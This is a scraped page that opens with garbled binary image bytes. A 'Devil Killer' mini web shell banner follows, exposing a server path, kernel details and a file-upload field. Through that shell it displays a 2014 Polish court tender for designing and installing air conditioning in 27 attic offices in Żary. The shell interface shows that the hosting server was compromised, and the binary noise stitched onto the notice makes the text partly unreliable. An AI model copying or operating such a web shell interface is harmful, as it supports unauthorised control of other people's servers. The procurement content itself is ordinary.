JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140410/79015-N-2014.html

<p class="kh_header"><b>Zielona Góra: Zaprojektowanie i wykonanie instalacji klimatyzacji dla 27 pomieszczeń biurowych na poddaszu dla Sądu Rejonowego w Żarach przy ul. Spokojnej 20</b><br>
<b>Numer ogłoszenia: 79015 - 2014; data zamieszczenia: 10.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Zielonej Górze , Pl. Słowiański 1, 65-958 Zielona Góra, woj. lubuskie, tel. 68 3220155, faks 68 3220155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie instalacji klimatyzacji dla 27 pomieszczeń biurowych na poddaszu dla Sądu Rejonowego w Żarach przy ul. Spokojnej 20.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zaprojektowanie i wykonanie instalacji klimatyzacji dla 27 pomieszczeń biurowych na poddaszu dla Sądu Rejonowego w Żarach przy ul. Spokojnej 20.
2.Zakres rzeczowy robót budowlanych określa program funkcjonalno-użytkowy zawarty w rozdziale III SIWZ.
3. Zakres rzeczowy przedmiotu zamówienia obejmuje:
1)wstępną wersję wykonania instalacji klimatyzacji w systemie VRV  obejmującej co najmniej lokalizację jednostek klimatyzacyjnych zewnętrznych i wewnętrznych, sposób prowadzenia przewodów zasilających jednostki i powrotu czynnika chłodzącego oraz odprowadzenia kondensatu w celu uzgodnienia wstępnej wersji z Zamawiającym przed wykonaniem dokumentacji projektowej.
Uzgodnienia dotyczyć będą między innymi:
a)ilości przyjętych układów systemu klimatyzacji,
b)miejsc lokalizacji jednostek klimatyzacyjnych zewnętrznych (agregatów klimatyzacyjnych),
c)miejsc lokalizacji w pomieszczeniach biurowych jednostek klimatyzacyjnych wewnętrznych,
d)miejsc lokalizacji aparatury sterującej systemami klimatyzacyjnymi,
e)tras prowadzenia przewodów klimatyzacyjnych i elektrycznych,
f)sposobu i miejsc odprowadzenia skroplin,
g)dostosowania kolorystyki pomieszczeń do kolorystyki istniejacej,
h)miejsca podłączenia zaprojektowanej instalacji elektrycznej do istniejącej w budynku instalacji elektrycznej.
2)opracowanie dokumentacji projektowej, w skład której wchodzić będzie:
a)trzy egzemplarze projektu budowlanego oraz trzy egzemplarze projektu wykonawczego (wraz z niezbędnym pozwoleniem na budowę lub zmianą istniejącego pozwolenia na budowę, oraz opiniami, uzgodnieniami, informacją dotyczącą bezpieczeństwa i ochrony zdrowia) opracowanych zgodnie z założeniami programu funkcjonalno- użytkowego, w tym między innymi:
- wykonywanie robót budowlanych przy równolegle prowadzonym zadaniu 
inwestycyjnym na obiekcie, (Wykonawca ma obowiązek uzgodnić trasy instalacji z Wykonawcą zadania inwestycyjnego na budowie),
- lokalizację i sposób posadowienia jednostek klimatyzacyjnych zewnętrznych,
- dobór jednostek klimatyzacyjnych zewnętrznych i wewnętrznych,
- lokalizację jednostek klimatyzacyjnych wewnętrznych w 27 pomieszczeniach,
- wykonanie instalacji elektrycznej  z podaniem szczegółów jej włączenia do instalacji elektrycznej już wykonanej w ramach prowadzonego zadania inwestycyjnego, 
- podłączenia i przebieg kanałów odprowadzających skropliny z klimatyzatorów (sposób odprowadzenia skroplin z jednostek wewnętrznych do kanalizacji sanitarnej),
- przejścia projektowanych instalacji przez przegrody budowlane z uwzględnieniem istniejących w budynku stref pożarowych (w przypadku przejść przez elementy konstrukcyjne projekt powinien zawierać stosowne opinie, uzgodnienia i ekspertyzy dotyczące ich lokalizacji oraz wpływu na bezpieczeństwo konstrukcji),
- malowanie pomieszczeń po wykonaniu instalacji klimatyzacji,
- malowanie konserwacyjne pomieszczeń nie klimatyzowanych (po wykonaniu ww. przejść instalacyjnych). 
Projekt należy opracować zgodnie z:
- obowiązującą wiedzą techniczną,
- wytycznymi zawartymi w programie funkcjonalno - użytkowym,
- dokonanymi uzgodnieniami, 
- obowiązującymi przepisami, w tym Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462 z późniejszymi zmianami),
- Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129 tekst jednolity); 
b)trzy egzemplarze STWiOR 
c)trzy egzemplarze informacji do Planu BIOZ,
d)przedmiar robót oraz kosztorys ofertowy z cenami jednostkowymi, dotyczący wykonania instalacji klimatyzacji (w tym wykonanie podstaw pod agregaty zewnętrzne, montaż urządzeń klimatyzacyjnych zewnętrznych i wewnętrznych, rur zasilających, powrotnych, odprowadzenia skroplin oraz roboty związane z rozbudową wykonanych inwestycyjnie instalacji elektrycznych), malowania pomieszczeń wewnętrznych, w których prowadzone będą roboty związane z wykonaniem instalacji klimatyzacji.
Przedmiar robót oraz kosztorys ofertowy powinny być opracowane zgodnie z zasadami sporządzania przedmiarów i obmiarów oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129 tekst jednolity);
e)ilość egzemplarzy wyszczególniona w ppkt. a), b), c), d) jest ilością, którą Wykonawca musi przekazać Zamawiającemu i nie obejmują egzemplarzy do uzyskania uzgodnień, pozwolenia lub zmiany pozwolenia na budowę itp
3)decyzję pozwolenia na budowę lub zmianę istniejącego pozwolenia na budowę,
4)jeden egzemplarz dokumentacji projektowej wymienionej w podpunktach a), b), c), d)  na nośniku CD w formatach plików otwartych:
- rysunki zapisane w formatach plików *.pdf,
- opisy techniczne do projektów oraz informacja dotycząca bezpieczeństwa i ochrony zdrowia zapisane zostaną w powszechnie używanym edytorze tekstowym w formacie *.doc i *.pdf,
- przedmiary zapisane w formacie *.pdf oraz *.ath,
- pozostałe dokumenty takie jak: uzgodnienia, opinie, ekspertyzy, decyzje itd. mają być zeskanowane i dołączone do dokumentacji przekazywanej na nośniku CD w formacie *.pdf lub *.jpg.
5)Wykonanie robót budowlano - montażowych na obiekcie (zgodnie z programem funkcjonalno-użytkowym oraz opracowaną przez Wykonawcę dokumentacją projektową i obowiązującymi przepisami) polegających między innymi na:
a)wykonaniu podstaw pod agregaty zewnętrzne instalacji klimatyzacji z podłączeniem do istniejącej instalacji odgromowej,
b)dostawie i montażu agregatów zewnętrznych klimatyzacji zgodnych z projektem i warunkami przewidzianymi w programie funkcjonalno - użytkowym,
c)wykonaniu instalacji elektrycznej zasilającej agregaty zewnętrzne i wewnętrzne instalacji klimatyzacji,
d)wykonaniu instalacji klimatyzacji (zasilanie, powrót, odprowadzenie skroplin w rurach),
e)dostawie i montażu jednostek wewnętrznych instalacji klimatyzacji zgodnych z projektem i warunkami przewidzianymi w programie funkcjonalno - użytkowym,
f)zabudowie rur i przewodów instalacji elektrycznej,
g)włączeniu rur odprowadzenia skroplin do istniejących pionów kanalizacji sanitarnej,
h)malowaniu pomieszczeń klimatyzowanych i nieklimatyzowanych (po przejściach montażowych),
6)uzyskanie w imieniu Zamawiającego stanowisk właściwych organów w przedmiocie zgodności wykonanych robót budowlanych z zatwierdzonym projektem,
7)Przedmiotem zamówienia, o którym mowa w pkt. 1 i pkt. 3, objęte jest również przeniesienie autorskich praw majątkowych na dostarczoną dokumentację w tym też dokumentację powykonawczą.
8)Projekt Wykonawczy o którym mowa w pkt. 3 ppkt 2) powinien zawierać:
- weryfikację kompletności wszystkich danych niezbędnych dla prawidłowego zaprojektowania i wykonania robót budowlanych (w porozumieniu z Wykonawcą zadania inwestycyjnego), 
- uzyskanie materiałów niezbędnych do projektowania, w tym aktualnej mapy do celów projektowych,
- obmiar powierzchni pomieszczeń i ich kubaturę pomierzonych z natury (niezbędnych do prawidłowego opracowania dokumentacji projektowej), oraz do właściwego doboru jednostek wewnętrznych i zewnętrznych,
- wykonanie opisów, obliczeń technicznych oraz rysunków technicznych, 
- zapewnienie, udziału w opracowaniu projektu osób posiadających uprawnienia budowlane do projektowania w odpowiedniej specjalności oraz wzajemne skoordynowanie techniczne wykonanych przez te osoby opracowań zapewniające uwzględnienie zawartych w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy, z uwzględnieniem specyfiki prac na czynnych obiektach budowlanych,
- zastosowanie w projekcie rozwiązań standardowych skutkujących optymalizacją kosztów (Zamawiający dokonał już odbioru od Wykonawcy zadania inwestycyjnego wykonanej klimatyzacji na parterze i I piętrze wraz z agregatami zewnętrznymi na dachu),
- wykonania dodatkowej dokumentacji uzupełniającej na własny koszt, jeżeli w trakcie uzyskiwania pozwolenia  lub zmiany pozwolenia na wykonanie robót budowlanych, zajdzie taka konieczność,
- zapewnienie nadzoru autorskiego w całym okresie realizacji umowy na koszt własny.
9)Wykonywanie robót, o których mowa w pkt. 3 ppkt 5) obejmuje następujące czynności: 
- zapewnienie objęcia kierownika budowy nad robotami sanitarnymi, posiadającego wymagane uprawnienia budowlane,
- przedłożenie Zamawiającemu dokumentów dotyczących zawiadomienia nadzoru budowlanego o zamierzonym terminie rozpoczęcia robót budowlanych,
- w porozumieniu z Wykonawcą zadania inwestycyjnego organizację placu budowy, w tym czynności związane z wykonaniem zasilania w wodę i energię elektryczną oraz ponoszeniem kosztów ich zużycia, z przygotowaniem placów składowych, zaplecza budowy oraz jego dozoru,
- organizację i koordynację robót budowlanych we wszystkich branżach objętych przedmiotem zamówienia,
- dostawę materiałów, urządzeń niezbędnych do wykonania robót budowlanych (zgodnych z ustaleniami SIWZ i z programem funkcjonalno - użytkowym),
- ewentualne wykonanie robót zamiennych nie zmieniających w istotnym zakresie przedmiot zamówienia,
- składowanie i utylizację materiałów z rozbiórki, zgodnie z obowiązującymi przepisami, usuwanie zanieczyszczeń (w tym odpadów wytworzonych w wyniku prowadzenia robót budowlanych),
- sporządzenie oraz prowadzenie dokumentacji budowy, w tym Dziennika Budowy,
- wykonanie wszystkich wymaganych pomiarów, prób, badań, rozruchów,
- przeprowadzenie szkoleń przedstawicieli  Użytkownika tj. Sądu Rejonowego w Żarach z obsługi urządzeń i aparatury sterowniczej,
- sporządzenie dokumentacji powykonawczej dla wykonanych robót budowlanych,
- uzyskiwanie opinii, deklaracji zgodności, atestów, zaświadczeń i innych wymaganych dokumentów,
- usuwanie wad i usterek w trakcie realizacji robót oraz w okresie rękojmi i gwarancji,
- ochronę i utrzymanie terenu budowy,
- likwidację placu budowy po zakończeniu robót,
- przedłożenie/przekazanie Zamawiającemu dokumentów dotyczących zawiadomienia organów o zakończeniu robót.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.33.00.00-9, 45.40.00.00-1, 45.44.00.00-3, 45.33.12.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w czasie ostatnich pięciu lat lub jeżeli okres działalności jest krótszy to w tym okresie, Wykonawca wykonał co najmniej dwie roboty budowlane polegające na wykonaniu instalacji klimatyzacji na kwotę minimum 100.000,00 zł brutto każda,
- w czasie ostatnich trzech lat, a jeżeli okres działalności jest krótszy to w tym okresie Wykonawca wykonał co najmniej dwie usługi projektowe polegające na wykonaniu projektu w zakresie instalacji klimatyzacji każda na kwotę minimum 5.000,00 zł brutto.
W przypadku gdy Wykonawca przedstawi zrealizowanie roboty typu zaprojektuj i wybuduj Zamawiający uzna wykonanie takiego zamówienia jako 1 robotę budowlaną i 1 usługę projektową w sytuacji gdy wykonawca wykaże wykonanie całości zamówienia typu zaprojektuj i wybuduj na kwotę minimum 105.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednio wykwalifikowanym personelem, w tym:
osobą lub osobami posiadającymi uprawnienia bez ograniczeń do:
- projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- projektowania w specjalności konstrukcyjno - budowlanej,
- kierownikiem budowy branży sanitarnej z uprawnieniami do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
Osoby ww. muszą spełniać warunki określone w ustawie z dnia 07 lipca 1994 r. Prawo Budowlane (t. j. Dz. U. z 2010 r., Nr 243, poz. 1623)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedłożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 400.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty - Załącznik nr 1 do I rozdziału SIWZ. Brak wypełnienia druku oferty w zakresie ceny ofertowej (wartość brutto, netto, podatek od towarów i usług) spowoduje odrzucenie oferty.
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
1)sposobu wykonania prac, w tym zakresie szczegółowych rozwiązań technicznych, o ile będą one prowadzić do zastosowania rozwiązań co najmniej równoważnych lub korzystniejszych pod względem materiałowym, technicznym, technologicznym, funkcjonalnym i eksploatacyjnym,
2)zlecania robót podwykonawcom - zmiana sposobu realizacji przedmiotu zamówienia w tym zakresie możliwa będzie w przypadku, gdy Wykonawca nie zadeklaruje w swojej ofercie wykonania przedmiotu zamówienia przy pomocy podwykonawców w określonym zakresie, a docelowo zechce dokonać zmiany umowy dotyczącej zlecania robót podwykonawcom, gdy zmiana taka przyczyni się do poprawienia szybkości lub jakości usług stanowiących przedmiot umowy, uchylenia niebezpieczeństwa opóźnień lub zwłoki w realizacji przedmiotu umowy, względnie wskazana jest ze względu na wymóg specjalistycznej wiedzy lub doświadczenia, niezbędnych do prawidłowego wykonania przedmiotu umowy,
3)zmiany wysokości podatku od towarów i usług VAT wyłącznie w zakresie kwoty podatku,
4)wystąpienie w trakcie wykonywania zamówienia kolizji z sieciami lub innymi przeszkodami, które nie były możliwe do przewidzenia po przeanalizowaniu wykonania zamówienia,
5)ponad przeciętne opóźnienie organów administracji w wydaniu decyzji lub uzgodnień koniecznych do zakończenia prawidłowego wykonania zadania,
6)zmiany terminu realizacji umowy, jeśli wynika z przyczyn określonych w pkt. 1), 4), 5) niniejszego ustępu.
